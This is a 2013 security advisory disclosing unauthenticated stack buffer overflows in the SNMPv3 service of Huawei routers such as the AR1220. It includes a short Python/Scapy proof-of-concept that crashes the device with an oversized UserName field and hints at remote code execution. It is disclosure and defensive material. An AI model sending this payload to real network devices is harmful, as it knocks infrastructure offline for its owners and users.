Multiple buffer overflows on Huawei SNMPv3 service
==================================================
[ADVISORY INFORMATION]
Title: Multiple buffer overflows on Huawei SNMPv3 service
Discovery date: 11/02/2013
Release date: 06/05/2013
Credits: Roberto Paleari (roberto.paleari@emaze.net, @rpaleari)
Advisory URL: http://blog.emaze.net/2013/05/multiple-buffer-overflows-on-huawei.html
[VULNERABILITY INFORMATION]
Class: Memory errors
[AFFECTED PRODUCTS]
We confirm the presence of these security vulnerabilities on the following
products:
* Huawei AR1220 (firmware version V200R002C02SPC121T)
According to Huawei security advisories [2,3] other products are also
vulnerable, but they were not checked.
[VULNERABILITY DETAILS]
The Huawei SNMPv3 service running on the affected devices is vulnerable to
multiple stack-based buffer overflow issues. These vulnerabilities can be
exploited by unauthenticated remote attackers.
The issues concern Huawei implementation of the SNMPv3 User-based Security
Model (USM [1]). Strictly speaking, attackers can overflow the
"AuthoritativeEngineID" and "UserName" SNMPv3 USM fields.
The vulnerabilities we identified can be classified according to the
exploitation context: some issues can be triggered only when SNMP debugging is
enabled, while others are exploitable in the default device configuration.
The first class of issues can be exploited only when SNMP debugging is enabled,
as they are related with the debugging code that displays the content of
incoming SNMP packets. Attackers can leverage these issues to achieve RCE, but
the actual impact is quite low, as SNMP debugging is usually disabled during
normal operation.
The second class of vulnerabilities affects the SNMPv3 packet decoder.
Differently than the previous ones, these issues can be exploited in the
default device configuration. Additionally, it is worth considering that ACLs
are ineffective at mitigating this threat, as SNMPv3 packets are processed by
the device even if the sender's IP is not included in the ACL. Similarly, the
vulnerabilities can be exploited even when no SNMPv3 users are configured.
In the following we include a "proof-of-concept" that exploit the latter
category. Our PoC simply crashes the device, but the payload can probably be
also adapted to achieve RCE.
This Python example crashes the device by overflowing the "UserName" SNMPv3 USM
field. Consider we used a slightly modified version of Python Scapy library to
properly support the SNMPv3 protocol. The complete Python script and the
modified Scapy library can be provided upon request.
<cut>
from scapy.all import *
def main():
DST = "192.168.1.1"
snmp = SNMPv3(version=3)
pkt = IP(dst=DST)/UDP(sport=RandShort(), dport=161)/snmp
pkt = snmpsetauth(pkt, "emaze", "MD5")
pkt["SNMPv3"].flags = 4
# Replace "user_name" with "auth_engine_id" in the next line to trigger the
# other overflow
pkt["SNMPv3"].security.user_name = "A"*4096
pkt.show()
send(pkt)
if __name__ == "__main__":
main()
</cut>
[REMEDIATION]
The device manufacturer has released updated firmware versions that should
remediate these issues. Huawei security advisories are available at [2,3].
[COPYRIGHT]
Copyright(c) Emaze Networks S.p.A 2013, All rights reserved worldwide.
Permission is hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers remain intact.
[DISCLAIMER]
Emaze Networks S.p.A is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service to the
professional security community. There are NO WARRANTIES with regard to this
information. Any application or distribution of this information constitutes
acceptance AS IS, at the user's own risk. This information is subject to change
without notice.
Footnotes:
[1] http://www.ietf.org/rfc/rfc2574.txt
[2] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260601.htm
[3] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260626.htm